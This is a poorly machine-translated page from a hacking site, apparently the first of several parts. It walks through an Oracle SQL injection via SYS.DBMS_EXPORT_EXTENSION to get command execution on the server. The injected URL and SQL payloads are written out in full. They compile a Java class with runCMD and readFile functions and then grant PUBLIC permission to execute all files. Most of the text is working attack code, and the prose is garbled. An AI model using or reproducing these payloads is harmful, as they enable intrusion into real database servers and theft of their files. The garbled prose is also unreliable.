Introduced that pours into on web through oracle obtains main engine cmdshell directly the method.
The following demonstration is on web sql the plus execution, when web pours into select SYS.DBMS_EXPORT_EXTENSION .....Altering to
/xxx.jsp? id=1 and '1 ' <>'a'||(select SYS.DBMS_EXPORT_EXTENSION .....)
Form then. (is to let sentence with " 'a'|| “return to the true value)
The sentence is a little long, possibly must use post to submit.
The following is each step:
1. founds the package
Through pours into the SYS.DBMS_EXPORT_EXTENSION function, founds Java on oracle to wrap LinxUtil, inside two functions, runCMD uses in the executive system order, readFile uses in reading the document:
/xxx.jsp? id=1 and '1 ' <>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('FOO', 'BAR', 'DBMS_OUTPUT” .PUT(:P1); EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD (String args) {try {BufferedReader myReader= new BufferedReader (
new InputStreamReader (Runtime.getRuntime().exec(args).getInputStream())); String stemp, str= ""; while ((stemp = myReader.readLine())! = null) str +=stemp+ " \ n "; myReader.close(); return str;} catch (Exception e) {return e.toString();}} public static String readFile (String filename) {try {BufferedReader myReader= new BufferedReader (new FileReader(filename)); String stemp, str= ""; while ((stemp = myReader.readLine())! = null) str +=stemp+ " \ n "; myReader.close(); return str;} catch (Exception e) {return e.toString();}}
} ''''; END; ''; END; --', 'SYS', 0, '1', 0) from dual
)
------------------------
If url has the length limit, may remove the readFile() function block, namely:
/xxx.jsp? id=1 and '1 ' <>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('FOO', 'BAR', 'DBMS_OUTPUT” .PUT(:P1); EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD (String args) {try {BufferedReader myReader= new BufferedReader (
new InputStreamReader (Runtime.getRuntime().exec(args).getInputStream())); String stemp, str= ""; while ((stemp = myReader.readLine())! = null) str +=stemp+ " \ n "; myReader.close(); return str;} catch (Exception e) {return e.toString();}}
} ''''; END; ''; END; --', 'SYS', 0, '1', 0) from dual
)
Meanwhile mentions the behind step the processing sentence removes to readFile().
------------------------------
2. bestows on the Java jurisdiction
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('FOO', 'BAR', 'DBMS_OUTPUT” .PUT(:P1); EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE '''' begin dbms_java.grant_permission ('''''''' PUBLIC '''''''', '''''''' SYS: java.io.Fi lePermission '''''''', '''''''' <<ALL FILES>> '''''''', '''''''' execute ''''''''); end; ''''; END; ''; END; --', 'SYS', 0, '1', 0) from dual
Other pages: : 1 * 2 * 3 * 4 * Next>>
|
You are here: hacking technology
> hacker invade
> Content
Category: Home
> hacker invade